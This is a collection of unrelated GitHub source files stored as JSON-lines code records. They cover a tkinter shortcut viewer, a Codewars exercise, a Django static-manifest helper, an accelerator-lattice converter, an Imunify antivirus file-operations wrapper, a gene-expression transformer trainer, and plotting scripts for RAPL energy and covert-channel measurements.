new=1)\r\n\r\n def bug():\r\n webbrowser.open('https://github.com/1bl4z3r/KeyShorts', new=1)\r\n\r\n def how():\r\n messagebox.showinfo(\"HowTo\", \"This is Alpha Version, so no HowTo\")\r\n\r\n def about():\r\n t = tkinter.Toplevel(self)\r\n t.title(\"About\")\r\n t.wm_iconbitmap('data\\logo.ico')\r\n t.geometry('300x100')\r\n\r\n more = tkinter.Label(t,\r\n text=u\"KeyShorts is a small freeware to provide all possible Keyboard shortcuts of various softwares and Operating Systems. Currently supporting Windows only.\",\r\n wraplength=300)\r\n more.pack()\r\n dev = tkinter.Label(t, text=u\"DEVELOPER-Ristik Majumdar\", wraplength=300)\r\n dev.pack()\r\n\r\n button = tkinter.Button(t, text=\"Got It!\", command=t.destroy)\r\n button.pack()\r\n\r\n self.grid()\r\n\r\n self.menubar = tkinter.Menu(self.parent)\r\n self.drop = tkinter.Menu(self.menubar, tearoff=0)\r\n self.drop.add_command(label=\"How To Use\", command=how)\r\n self.drop.add_command(label=\"About\", command=about)\r\n self.drop.add_separator()\r\n self.drop.add_command(label=\"Submit Feedback\", command=feedback)\r\n self.drop.add_command(label=\"Report A Bug\", command=bug)\r\n self.drop.add_command(label=\"Check For Updates\", command=update)\r\n\r\n self.menubar.add_cascade(label=\"Help\", menu=self.drop)\r\n self.menubar.add_command(label=\"Exit\", command=self.quit)\r\n self.config(menu=self.menubar)\r\n\r\n self.search_query = tkinter.StringVar()\r\n\r\n self.search = tkinter.Label(self, text=u\"Search: \")\r\n self.search.grid(column=0, row=0, sticky='EW')\r\n\r\n self.searchbox = tkinter.Entry(self, textvariable=self.search_query)\r\n self.searchbox.grid(column=1, row=0, sticky='EW')\r\n self.search_query.set(u\"Currently Unavailable\")\r\n\r\n self.searchbtn = tkinter.Button(self, text=u\"Find\") #\\U0001F50D\r\n self.searchbtn.grid(column=2, row=0, sticky='EW')\r\n\r\n self.list = tkinter.Listbox(self)\r\n self.scrollbar = tkinter.Scrollbar(self, orient=\"vertical\")\r\n\r\n self.list.config(yscrollcommand=self.scrollbar.set)\r\n self.scrollbar.config(command=self.list.yview)\r\n\r\n for i in range(sheet.nrows):\r\n self.list.insert(tkinter.END, \" \".join(sheet.row_values(i)))\r\n\r\n self.list.grid(row=1, column=0, sticky='NSEW', columnspan=2)\r\n self.list.columnconfigure(0, weight=1)\r\n\r\n self.scrollbar.grid(column=2, row=1, sticky='NS')\r\n self.grid_columnconfigure(1, weight=1)\r\n self.grid_rowconfigure(1, weight=1)\r\n\r\n self.resizable(False, True)\r\n self.update()\r\n self.geometry(self.geometry())\r\n\r\n\r\nif __name__ == \"__main__\":\r\n app = Keyshorts(None)\r\n app.title('KeyShorts (0.0.2)')\r\n app.wm_iconbitmap('data\\logo.ico')\r\n app.geometry('1000x500')\r\n app.mainloop()\r\n","repo_name":"1bl4z3r/KeyShorts","sub_path":"KeyShorts.py","file_name":"KeyShorts.py","file_ext":"py","file_size_in_byte":3858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23915233814","text":"# Task\n# Given an array of integers, remove the smallest value. Do not mutate the\n# original array/list. If there are multiple elements with the same value,\n# remove the one with a lower index. 
If you get an empty array/list, return an\n# empty array/list.\n\n# Don't change the order of the elements that are left.\n\n# Examples\n# * Input: [1,2,3,4,5], output = [2,3,4,5]\n# * Input: [5,3,2,1,4], output = [5,3,2,4]\n# * Input: [2,2,1,2,1], output = [2,2,2,1]\n\nimport codewars_test as test\n\n\ndef remove_smallest(numbers):\n if not numbers:\n return []\n result = []\n minimum = min(numbers)\n seen_minimum = False\n for number in numbers:\n if number == minimum and seen_minimum is False:\n seen_minimum = True\n else:\n result.append(number)\n return result\n\n\ntest.describe(\"remove_smallest\")\n\ntest.it(\"works for the examples\")\ntest.assert_equals(\n remove_smallest([1, 2, 3, 4, 5]), [2, 3, 4, 5], \"Wrong result for [1, 2, 3, 4, 5]\"\n)\ntest.assert_equals(\n remove_smallest([5, 3, 2, 1, 4]), [5, 3, 2, 4], \"Wrong result for [5, 3, 2, 1, 4]\"\n)\ntest.assert_equals(\n remove_smallest([1, 2, 3, 1, 1]), [2, 3, 1, 1], \"Wrong result for [1, 2, 3, 1, 1]\"\n)\ntest.assert_equals(remove_smallest([]), [], \"Wrong result for []\")\n\nfrom numpy.random import randint\n\n\ndef randlist():\n return list(randint(400, size=randint(1, 10)))\n\n\ntest.it(\"returns [] if list has only one element\")\nfor i in range(10):\n x = randint(1, 400)\n test.assert_equals(remove_smallest([x]), [], \"Wrong result for [{}]\".format(x))\n\ntest.it(\"returns a list that misses only one element\")\nfor i in range(10):\n arr = randlist()\n test.assert_equals(\n len(remove_smallest(arr[:])),\n len(arr) - 1,\n \"Wrong sized result for {}\".format(arr),\n )\n","repo_name":"JacksonJW/practice-problems-interview-prep","sub_path":"codewars/python/remove_the_minimum.py","file_name":"remove_the_minimum.py","file_ext":"py","file_size_in_byte":1787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"724819193","text":"#!/usr/bin/env python\n# Calculate gripper position given shoulder pose and arm servo angles\n# can be used for real position (but usually get directly from \"get_gripper_xyz\")\n# but mostly used for arm movement planning\n\nimport sys\nimport roslib\nimport rospy, time\n\nimport tf\nfrom tf import TransformListener\n#import moveit_commander\n#from moveit_commander import MoveGroupCommander\nfrom tf.transformations import euler_from_quaternion, quaternion_from_euler\nimport geometry_msgs.msg\n# use numpy?\n\nclass GetGripperPose():\n def __init__(self):\n \n rospy.init_node('GetGripperPose')\n\n # returns absolute gripper_link xyz position from base_link\n def CalculateXYZ( right_arm,\n shoulder_position_x, \n shoulder_position_y, \n shoulder_position_z, \n right_arm_shoulder_rotate_angle,\n right_arm_shoulder_lift_angle,\n right_arm_elbow_rotate_angle,\n right_arm_elbow_bend_angle,\n right_arm_wrist_bend_angle):\n \n gripper_x = 0.0\n gripper_y = 0.0\n gripper_z = 0.0\n\n\n \n\n\nif __name__=='__main__':\n\n try:\n GetGripperPose()\n except rospy.ROSInterruptException:\n rospy.loginfo(\"Oops! Exception occurred.\") \n\n\n\n\n\n\n","repo_name":"shinselrobots/sheldon","sub_path":"sheldon_servos/src/sheldon_servos/calculate_gripper_xyz.py","file_name":"calculate_gripper_xyz.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"24894181259","text":"from fnmatch import fnmatch\n\nfrom django.contrib.staticfiles.storage import staticfiles_storage\n\n\ndef load_manifest(*paths):\n \"\"\"Get manifest for static files.\n\n .. 
note:: This is experimental; use with caution.\n\n    This is for use with Django's ``ManifestStaticFilesStorage``. Its\n    main purpose is to provide a way to pass the static files manifest\n    to JavaScript so that static paths can be generated correctly.\n\n    The :func:`arcutils.templatetags.arc.staticfiles_manifest` template\n    tag wraps this function and can be used to inject the manifest into\n    an entry point template as JSON.\n\n    Args:\n        paths: If no paths are passed, the entire manifest will be\n            returned. If one or more paths are passed, the manifest will\n            be filtered to include only those paths; these paths can be\n            shell-style patterns with wildcards (e.g., 'path/*').\n\n    Returns:\n        dict: { path => manifest path }\n        None: If ``ManifestStaticFilesStorage`` isn't being used\n\n    \"\"\"\n    try:\n        staticfiles_storage.load_manifest\n    except AttributeError:\n        return None\n    else:\n        manifest = staticfiles_storage.load_manifest()\n\n    if paths:\n        paths_to_remove = []\n        for manifest_path in manifest:\n            # keep a path if it matches at least one pattern; appending once per\n            # non-matching pattern would remove matching paths and delete twice\n            if not any(fnmatch(manifest_path, path) for path in paths):\n                paths_to_remove.append(manifest_path)\n        for manifest_path in paths_to_remove:\n            del manifest[manifest_path]\n\n    return manifest\n","repo_name":"PSU-OIT-ARC/django-arcutils","sub_path":"arcutils/staticfiles.py","file_name":"staticfiles.py","file_ext":"py","file_size_in_byte":1523,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"}
+{"seq_id":"19402016434","text":"import ocelot.cpbd.elements as elements\nfrom ocelot.cpbd.beam import Twiss\nimport logging\n\ntry:\n    import tfs\nexcept ImportError:\n    logging.getLogger(__file__).warning(\n        f\"Optional package: TFS-Pandas missing. {__name__} will lack functionality.\"\n    )\n\n\n\n\n
def tfs_to_cell_and_optics(tfs_path):\n    tfs_table = tfs.read(tfs_path)\n\n    cell = convert_tfs_lattice(tfs_table)\n    optics = optics_from_tfs(tfs_table)\n    return cell, optics\n\n
def optics_from_tfs(tfs_table):\n    twiss = Twiss()\n\n    try:\n        header = tfs_table.headers\n    except AttributeError:\n        tfs_table = tfs.read(tfs_table)\n        header = tfs_table.headers\n\n    twiss.E = header[\"ENERGY\"]\n    twiss.emit_x = header[\"EX\"]\n    twiss.emit_y = header[\"EY\"]\n    rel_gamma = header[\"GAMMA\"]\n    twiss.emit_xn = twiss.emit_x * rel_gamma\n    twiss.emit_yn = twiss.emit_y * rel_gamma\n\n    first = tfs_table.iloc[0]\n    twiss.alpha_x = first[\"ALFX\"]\n    twiss.alpha_y = first[\"ALFY\"]\n    twiss.beta_x = first[\"BETX\"]\n    twiss.beta_y = first[\"BETY\"]\n    twiss.Dx = first[\"DX\"]\n    twiss.Dy = first[\"DY\"]\n    twiss.Dxp = first[\"DPX\"]\n    twiss.Dyp = first[\"DPY\"]\n    twiss.x = first[\"X\"]\n    twiss.y = first[\"Y\"]\n    twiss.xp = first[\"PX\"]\n    twiss.yp = first[\"PY\"]\n\n    return twiss\n\n\n
class UnsupportedMADXElementType(RuntimeError): pass\n\n
def convert_tfs_lattice(tfs_table, converter=None):\n    if converter is None:\n        converter = MADXLatticeConverter()\n\n    for row in tfs_table.itertuples():\n        yield converter.dispatch(row)\n\n\n
class MADXLatticeConverter:\n    def dispatch(self, row):\n        etype = row.KEYWORD\n        etypelow = etype.lower()\n        try:\n            return getattr(self, f\"make_{etypelow}\")(row)\n        except AttributeError:\n            raise UnsupportedMADXElementType(\n                f\"Unsupported element type: {etype}.\"\n            )\n\n    def make_marker(self, row):\n        return elements.Marker(eid=row.NAME)\n\n    def make_monitor(self, row):\n        return elements.Monitor(eid=row.NAME, l = row.L)\n\n    def make_drift(self, row):\n        return elements.Drift(eid=row.NAME, l=row.L)\n\n    def make_sbend(self, row):\n        return elements.SBend(eid=row.NAME,\n                              l=row.L,\n                              angle=row.ANGLE,\n                              tilt=row.TILT,\n                              e1=row.E1,\n                              e2=row.E2)\n\n    def make_rbend(self, row):\n        return elements.RBend(eid=row.NAME,\n                              l=row.L,\n                              angle=row.ANGLE,\n                              k1=row.K1L/row.L,\n                              k2=row.K2L/row.L,\n                              tilt=row.TILT,\n                              e1=row.E1,\n                              e2=row.E2,\n                              fint=row.FINT,\n                              fintx=row.FINTX)\n\n    def make_quadrupole(self, row):\n        return elements.Quadrupole(eid=row.NAME,\n                                   l=row.L,\n                                   k1=row.K1L/row.L,\n                                   tilt=row.TILT)\n\n    def make_sextupole(self, row):\n        return elements.Sextupole(eid=row.NAME,\n                                  l=row.L,\n                                  k2=row.K2L/row.L,\n                                  tilt=row.TILT)\n\n    def make_octupole(self, row):\n        return elements.Octupole(eid=row.NAME,\n                                 l=row.L,\n                                 k3=row.K3L/row.L,\n                                 tilt=row.TILT)\n\n    def make_vkicker(self, row):\n        return elements.Vcor(eid=row.NAME,\n                             l=row.L,\n                             angle=row.VKICK)\n    def make_hkicker(self, row):\n        return elements.Hcor(eid=row.NAME,\n                             l=row.L,\n                             angle=row.HKICK)\n","repo_name":"ocelot-collab/ocelot","sub_path":"ocelot/adaptors/tfs.py","file_name":"tfs.py","file_ext":"py","file_size_in_byte":3881,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"53"}
+{"seq_id":"36804613559","text":"#!/usr/bin/env python3\n\"\"\"File operations\"\"\"\nimport json\nimport subprocess\nfrom argparse import ArgumentParser\n\n\nFILE_ACTION_DELETE = \"delete\"\nFILE_ACTION_CURE = \"cure\"\nFILE_ACTION_RESTORE = \"restore\"\nOPERATION_STATUS_SUCCESS = \"success\"\nOPERATION_STATUS_FAILED = \"failed\"\n\n\n
def get_malicious_list(host: str, action: str):\n    cmd = [\"/usr/bin/ssh\", \"-o\", \"StrictHostKeyChecking=no\", \"root@\" + host]\n    cmd.extend([\"imunify-antivirus\", \"malware\", \"malicious\", \"list\", \"--json\"])\n    proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n    proc.wait()\n    proc_stdout = proc.stdout.read().decode(\"utf-8\")\n    malicious_list = json.loads(proc_stdout)\n    file_statuses = [\"cleanup_done\", \"cleanup_removed\"] if action == \"restore\" else [\"found\"]\n    return [item[\"id\"] for item in malicious_list.get(\"items\", []) if item[\"status\"] in file_statuses]\n\n\n
def handle_operation(params, extended_cmd):\n    \"\"\"\n    Execute the operation\n    :param params: Parameters used to launch the operation\n    :param extended_cmd: Command that performs the operation\n    :return:\n    \"\"\"\n    operation_result = {\"action\": params.action, \"status\": OPERATION_STATUS_SUCCESS, \"result\": list()}\n\n    malicious_ids = get_malicious_list(params.host, params.action)\n    for file in params.file:\n        file_id, iav_file_id = file\n\n        result = {\"id\": file_id, \"status\": OPERATION_STATUS_FAILED, \"result\": str(), \"error\": str()}\n        try:\n            if int(iav_file_id) not in malicious_ids:\n                result[\"error\"] = \"Can not find file in imunify malicious list\"\n        except ValueError:\n            result[\"error\"] = \"Only integer file ids\"\n\n        cmd = [\"/usr/bin/ssh\", \"-o\", \"StrictHostKeyChecking=no\", \"root@\" + params.host]\n        cmd.extend(extended_cmd)\n        cmd.append(iav_file_id)\n\n        proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n        proc.wait()\n\n        result[\"id\"] = file_id\n        result[\"status\"] = OPERATION_STATUS_SUCCESS if proc.returncode == 0 else OPERATION_STATUS_FAILED\n        result[\"result\"] = proc.stdout.read().decode(\"utf-8\")\n        result[\"error\"] = proc.stderr.read().decode(\"utf-8\")\n        operation_result[\"result\"].append(result)\n\n    return operation_result\n\n\n
def process(params):\n    \"\"\"\n    Handle the request\n    :param params: Parameters of the requested operation\n    :return:\n    \"\"\"\n    if params.action == FILE_ACTION_DELETE:\n        extended_cmd = [\"imunify-antivirus\", \"malware\", \"malicious\", \"delete\"]\n        return handle_operation(params, extended_cmd)\n    if params.action == FILE_ACTION_CURE:\n        extended_cmd = [\"/bin/python3\", \"/opt/ispsystem/plugin/imunify/heal.py\", \"--iav-file-id\"]\n        return handle_operation(params, extended_cmd)\n    if params.action == FILE_ACTION_RESTORE:\n        extended_cmd = [\"imunify-antivirus\", \"malware\", \"malicious\", \"restore-original\"]\n        return handle_operation(params, extended_cmd)\n\n    return {\"action\": params.action, \"status\": OPERATION_STATUS_FAILED, \"error\": \"There is no handler for this action\"}\n\n\n
if __name__ == '__main__':\n    parser = ArgumentParser()\n    parser.add_argument(\"--host\", help=\"Host\", required=True)\n    parser.add_argument(\"--action\", help=\"Action\", required=True)\n    parser.add_argument(\"--file\", action='append', nargs=2, help=\"File\", metavar=(\"FILE_ID\", \"IAV_FILE_ID\"), required=True)\n    args = parser.parse_args()\n\n    if args.host and args.action:\n        result = process(args)\n        print(json.dumps(result))\n","repo_name":"ispsystem/plugin-imunify","sub_path":"server/scripts/files.py","file_name":"files.py","file_ext":"py","file_size_in_byte":3621,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"}
+{"seq_id":"5830041010","text":"import os\nimport random\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport multiprocessing\n\nfrom tqdm import tqdm\n\nfrom transformers import BertTokenizer\n\nfrom sklearn.metrics import precision_recall_fscore_support\n\nfrom models.base import *\nfrom models.base import _USE_HALFLIFE, _USE_SEQ, _USE_TF\nfrom models.utils import (\n    get_data_loader,\n)\nfrom models.DataEmbedding import DataEmbedding\nfrom models.BertDeepLncLocEmbedding import BertDeepLncLocEmbedding\n\nfrom tools import cpp_utils\n\n\nBERT_PATH = \"trained_models/bert/promoter_k3_to_k7/checkpoint-100000\"\n\n\n
class SeqHalflifeToTFDataset(Dataset):\n    def __init__(self, filename, truncation: tuple = None, promoter_embedding=True, **kwargs) -> None:\n        super().__init__()\n        # bert_path = \"trained_models/bert/promoter_k5/checkpoint-70000\"\n        self.tokenizer = BertTokenizer.from_pretrained(BERT_PATH)\n        file = h5py.File(filename, \"r\", swmr=True)\n        self.X_promoter = file[\"promoter\"]\n        self.X_halflife, self.tf, self.y = (\n            torch.tensor(np.array(file[\"halflife\"]), dtype=torch.float32),\n            torch.tensor(np.array(file[\"tf\"]), dtype=torch.float32),\n            torch.tensor(np.array(file[\"label\"]), dtype=torch.float32),\n        )\n        if truncation:\n            self.X_promoter = self.X_promoter[:, truncation[0] : truncation[1]]\n        if self.X_promoter.dtype == np.bool8:\n            self.X_promoter = self.X_promoter.astype(np.float32)\n        self.embedded_promoter = multiprocessing.Manager().dict() if promoter_embedding else None\n\n    def __len__(self):\n        return len(self.y)\n\n    def embedding(self, onehot_sent):\n        onehot_sent = np.insert(onehot_sent, 4, 1, axis=1) # 0:A, 1:C, 2:G, 3:T, 4:none\n        max_indices = np.argmax(onehot_sent, axis=1)\n        char_dict = {4: \"N\", 0: \"A\", 1: \"C\", 2: \"G\", 3: \"T\"}\n        translated_sent = \"\".join([char_dict[i.item()] for i in max_indices])\n        small_sent_ls = cpp_utils.sliding_window(translated_sent, 100, 50)\n        fragmented_sent_ls = []\n        for small_sent in small_sent_ls:\n            sent = \" \".join(cpp_utils.fragment(4, 4, small_sent))\n            fragmented_sent_ls.append(sent)\n        input_ids = torch.tensor(\n            np.array(\n                self.tokenizer(\n                    fragmented_sent_ls,\n                    add_special_tokens=False,\n                )[\"input_ids\"],\n                dtype=np.int32,\n            )\n        )\n        return input_ids\n\n    def __getitem__(self, 
idx):\n promoter = self.X_promoter[idx]\n if self.embedded_promoter is not None:\n if idx in self.embedded_promoter:\n promoter = self.embedded_promoter[idx]\n else:\n promoter = self.embedding(promoter)\n self.embedded_promoter[idx] = promoter\n return promoter, self.X_halflife[idx], self.tf[idx], self.y[idx]\n\n\nclass TransformerSeqHalflifeToTF(ModelBase):\n tags = [\"TransformerSeqHalflifeToTF\"]\n\n def __init__(self, n_heads=4, dropout_rate=0.1) -> None:\n super().__init__()\n self.model_type = \"TransformerSeqHalflifeToTF\"\n self.seq_deeplncloc_embedding = BertDeepLncLocEmbedding(BERT_PATH)\n hidden_size = 256\n self.hidden_size = hidden_size\n self.half_embedding = DataEmbedding(\n hidden_size, length=8, norm_type=\"bn\", pos_embedding=\"abs\", dropout=dropout_rate, cls_token=False\n )\n self.mixture_encoder = nn.TransformerEncoder(\n nn.TransformerEncoderLayer(\n d_model=hidden_size,\n nhead=n_heads,\n dim_feedforward=hidden_size * 4,\n batch_first=True,\n ),\n num_layers=2,\n )\n self.final_fc = nn.Sequential(\n nn.Linear(256 + 8, 256),\n nn.ReLU(),\n nn.Dropout(dropout_rate),\n nn.Linear(256, 181),\n nn.Sigmoid(),\n )\n\n def forward(self, input_seq, input_halflife, input_tf, predict=True):\n \"\"\"\n :param input_seq: [bs, seq_len, channels]\n :param input_halflife: [bs, 8]\n :param input_tf: [bs, 181]\n \"\"\"\n seq = input_seq\n halflife = input_halflife\n tf = input_tf\n all_data = None\n seq = self.seq_deeplncloc_embedding(seq)\n\n halflife = self.half_embedding(halflife)\n all_data = torch.cat([seq, halflife], dim=1)\n all_data = self.mixture_encoder(all_data) # [bs, seq_len/210, channels]\n\n feature = torch.mean(all_data, dim=1)\n feature = torch.cat([feature, input_halflife], dim=1)\n if predict:\n return self.final_fc(feature)\n else:\n return feature\n\n\nclass TransformerSeqHalflifeToTFTrainer(BaseTrainer):\n def __init__(self) -> None:\n super().__init__(\n patience=5,\n )\n\n @staticmethod\n def get_data_loader():\n center = 10000\n upstream = center - 7000\n downstream = center + 3500\n datadir = \"Dataset/dataset_aumentati\"\n filename_format = \"{}_tf.h5\"\n trainloader, validloader, testloader = get_data_loader(\n filenames=[os.path.join(datadir, filename_format.format(i)) for i in (\"train\", \"validation\", \"test\")],\n batch_size=4 if os.environ.get(\"_USE_SEQ\") == \"1\" else 128,\n dateset_cls=SeqHalflifeToTFDataset,\n truncation=(upstream, downstream),\n num_workers=12,\n promoter_embedding=True if os.environ.get(\"_USE_SEQ\") == \"1\" else False,\n )\n return trainloader, validloader, testloader\n\n def generate_model_optimizer_criterion(self):\n model = TransformerSeqHalflifeToTF().to(torch.device(\"cuda\"))\n optimizer = optim.AdamW(model.parameters(), lr=1e-5)\n criterion = nn.BCELoss()\n return model, optimizer, criterion\n\n def start_one_run(self, run, model, optimizer, criterion, trainloader, validloader, testloader):\n last_boost = 0\n best_model_f1 = -100\n for epoch in range(self.epochs):\n train_loss = self.train(epoch, model, optimizer, criterion, trainloader)\n eval_loss, eval_f1 = self.evaluate(epoch, model, criterion, validloader, log_prefix=\"val\")\n if eval_f1 > best_model_f1:\n print(\"Saving model\")\n model_name = model.__class__.__name__\n project_name = f\"SEQ{_USE_SEQ}-HALF{_USE_HALFLIFE}-TF{_USE_TF}\"\n model_path = os.path.join(\"trained_models\", model_name, project_name)\n if not os.path.exists(model_path):\n os.makedirs(model_path)\n while len(glob.glob(f\"{model_path}/*.pt\")) > 2:\n 
os.remove(sorted(glob.glob(f\"{model_path}/*.pt\"))[0])\n torch.save(\n model.state_dict(), os.path.join(model_path, f\"{model_name}-{eval_f1:.3f}-{eval_loss:.3f}.pt\")\n )\n self.best_model_state = copy.deepcopy(model.state_dict())\n best_model_f1 = eval_f1\n last_boost = 0\n else:\n last_boost += 1\n if last_boost > self.patience:\n print(\"Early stopping. Best model f1: {:.3f}\".format(best_model_f1))\n break\n model.load_state_dict(self.best_model_state)\n test_loss, test_f1 = self.evaluate(epoch, model, criterion, testloader, log_prefix=\"test\")\n print(\"Best model test f1: {:.3f} loss:{:.3f}\".format(test_f1, test_loss))\n self.writer.finish()\n return test_f1, test_loss\n\n @torch.no_grad()\n def evaluate(self, epoch, model, criterion, dataloader, log_prefix=\"val\"):\n model.eval()\n test_loss_ls = []\n y_pred_ls = []\n tf_true_ls = []\n for i, (X_promoter, X_halflife, X_tf, y) in enumerate(tqdm(dataloader, desc=\"Testing\", ncols=100)):\n X_promoter, X_halflife, X_tf = (\n X_promoter.to(self.device),\n X_halflife.to(self.device),\n X_tf.to(self.device),\n )\n y_pred = model(\n X_promoter,\n X_halflife,\n X_tf,\n )\n y_pred = y_pred.squeeze().cpu()\n y_pred_ls.append(y_pred)\n tf_true_ls.append(X_tf.cpu())\n loss = criterion(y_pred, X_tf.cpu())\n test_loss_ls.append(loss.item())\n\n loss = np.mean(test_loss_ls)\n y_pred_ls, tf_true_ls = torch.cat(y_pred_ls), torch.cat(tf_true_ls)\n precision, recall, f1, _ = precision_recall_fscore_support(tf_true_ls, y_pred_ls > 0.5, average=\"micro\")\n print(\n f\"\\033[31m{log_prefix} set: loss:{loss:.4f} precision: {precision:.4f} recall:{recall:.4f} f1:{f1:.4f} \\033[0m\"\n )\n\n return loss, f1\n\n def train(self, epoch, model, optimizer, criterion, trainloader):\n model.train()\n train_loss_ls = []\n for i, (X_promoter, X_halflife, X_tf, y) in enumerate(\n tqdm(trainloader, desc=\"Training {}\".format(epoch), ncols=100)\n ):\n X_promoter, X_halflife, X_tf = (\n X_promoter.to(self.device),\n X_halflife.to(self.device),\n X_tf.to(self.device),\n )\n optimizer.zero_grad()\n y_pred = model(X_promoter, X_halflife, X_tf)\n y_pred = y_pred.squeeze().cpu()\n y = y.squeeze().cpu()\n loss = criterion(y_pred, X_tf.cpu())\n train_loss_ls.append(loss.item())\n loss.backward()\n nn.utils.clip_grad_norm_(model.parameters(), 5)\n optimizer.step()\n print(f\"\\033[34mTrain Epoch: {epoch} \\tLoss: {np.mean(train_loss_ls):.6f} \\033[0m\")\n self.writer.log({\"train/loss\": np.mean(train_loss_ls)})\n return np.mean(train_loss_ls)\n","repo_name":"doveppp/MultimodalExpression","sub_path":"models/TransformerSeqHalflifeToTF.py","file_name":"TransformerSeqHalflifeToTF.py","file_ext":"py","file_size_in_byte":9850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5481026964","text":"import argparse\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport sys\n\nLOOPS_STATS_FILE = \"loop_stats.txt\"\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-i', nargs='+')\nparser.add_argument('-o', nargs='+')\nparser.add_argument('-r', nargs='+')\nparser.add_argument('-c', nargs=1)\n\nargs = parser.parse_args()\n\nwith open(LOOPS_STATS_FILE) as f:\n runs = int((f.readline().split(\":\"))[1])\n loop_iterations = int((f.readline().split(\":\"))[1])\n empty_loop_iterations = int((f.readline().split(\":\"))[1])\n loop_energy = float((f.readline().split(\":\"))[1])\n loop_time = float((f.readline().split(\":\"))[1])\n\nloop_time_per_iteration = loop_time / 
empty_loop_iterations\nenergy_per_iteration = loop_energy / empty_loop_iterations\n\nenergy_per_iteration_micro = energy_per_iteration * 1000000\n\ndef plot_rapl_refresh_rates():\n if not args.r:\n return\n\n for input in args.r:\n data = np.loadtxt(input, delimiter=',', skiprows=1)\n\n data = data * 1000000 # to microseconds\n\n hist, bins = np.histogram(data, bins=50)\n plt.plot(bins[1:], hist, label=(input.split(\".\")[0]))\n\n plt.ylabel(\"Počet prípadov\")\n plt.xlabel(\"Čas [\\u03bcs]\")\n plt.legend()\n plt.grid()\n plt.show()\n\ndef plot_instruction_energy():\n if not args.i:\n return\n\n for input in args.i:\n data = np.loadtxt(input, delimiter=',', skiprows=1)\n\n data = np.split(data, runs)\n data = np.median(data, axis=1)\n\n data = data / loop_iterations\n data = data - energy_per_iteration_micro\n\n # For consistent zoom-in on the plot\n #data = data[(data <= 0.5)]\n\n #sns.kdeplot(data, label=(input.split(\".\")[0]))\n\n hist, bins = np.histogram(data, bins='auto')\n plt.plot(bins[1:], hist, label=(input.split(\".\")[0]))\n\n plt.ylabel(\"Počet prípadov\")\n plt.xlabel(\"Energia v \\u03bcJ\")\n plt.legend()\n plt.grid()\n plt.show()\n\ndef plot_operand_energy():\n if not args.o:\n return\n\n for input in args.o:\n data = np.loadtxt(input, delimiter=',', skiprows=1)\n\n data = np.split(data, runs)\n data = np.median(data, axis=1)\n\n data = data / loop_iterations\n data = data - energy_per_iteration_micro\n\n # For consistent zoom-in on the plot\n data = data[(data <= 0.5)]\n\n sns.kdeplot(data, label=(input.split(\".\")[0]))\n\n plt.ylabel(\"Odhad hustoty rozloženia (KDE)\")\n plt.xlabel(\"Energia v \\u03bcJ\")\n plt.legend()\n plt.grid()\n plt.show()\n\ndef plot_covert_channel():\n if not args.c:\n return\n\n f = args.c[0]\n\n data = np.loadtxt(f)\n\n plt.plot(data)\n plt.ylabel(\"Energia v \\u03bcJ\")\n\n #window = 10\n #avg = np.convolve(data, np.ones(window), 'valid') / window\n #plt.plot(avg, label=\"rolling average\")\n plt.grid()\n plt.show()\n\nplot_rapl_refresh_rates()\nplot_instruction_energy()\nplot_operand_energy()\nplot_covert_channel()\n","repo_name":"pemeth/bza-platypus","sub_path":"plotter.py","file_name":"plotter.py","file_ext":"py","file_size_in_byte":2950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72038094248","text":"import os\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport json\nimport argparse\nfrom mli_eval.plotting.scatter import mscatter\n\nfrom sklearn.linear_model import LinearRegression\n\n\ncolors = sns.color_palette()\nplt.style.use(\"seaborn\")\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"summary_path\")\nparser.add_argument(\"--thresh\", type=float, default=0.1)\nparser.add_argument(\"--show\", action=\"store_true\")\nargs = parser.parse_args()\n\n\ndef plot_gl_vs_wdist(\n data, threshold=0.1, figname=\"gl_vs_wdist.png\",\n figtitle=\"Distance in weight space against Gauss length\",\n normalized=False, conf_filter=None):\n gauss_lengths = []\n wdists = []\n loss = []\n markers = []\n \n for run in data:\n marker = \"o\"\n if conf_filter is not None and not conf_filter(run[\"config\"]):\n continue\n min_loss = run[\"min_train_loss\"]\n if min_loss < threshold:\n markers.append(marker)\n loss.append(min_loss)\n gauss_lengths.append(run[\"gauss_length\"])\n wdists.append(run[\"normed_weight_dist\"] if normalized else run[\"weight_dist\"])\n \n fig, ax = plt.subplots(figsize=(6,3))\n xlabel = r\"$\\log \\Vert \\theta_T - 
\\theta_0 \\Vert_2$\"\n if normalized:\n xlabel += r\" - $\\log \\Vert \\theta_0 \\Vert_2$\"\n ax.set_xlabel(xlabel, fontsize=14)\n ax.set_ylabel(r\"$\\log$(Gauss length)\", fontsize=14)\n ax.set_title(figtitle, fontsize=16)\n \n log_wd = np.log(wdists)\n log_gl = np.log(gauss_lengths)\n mscatter(log_wd, log_gl, ax=ax, alpha=1, color = \"b\", m=markers)\n plt.tight_layout()\n \n path = os.path.join(os.path.dirname(args.summary_path), figname)\n plt.savefig(path)\n if args.show:\n plt.show()\n \n reg = LinearRegression().fit(log_wd.reshape(-1, 1), log_gl.reshape(-1, 1))\n r2 = reg.score(log_wd.reshape(-1, 1), log_gl.reshape(-1, 1))\n print(\"Goodness of fit: {}\".format(r2))\n print(\"Slope: {}\".format(reg.coef_))\n\ndef main(summary_path, threshold=0.1):\n with open(summary_path) as f:\n data = json.load(f)\n plot_gl_vs_wdist(\n data, figname=\"gl_vs_wdist.pdf\",\n figtitle=r\"Autoencoder Gauss length vs weight distance\",\n threshold=threshold,\n normalized=True\n )\n\n 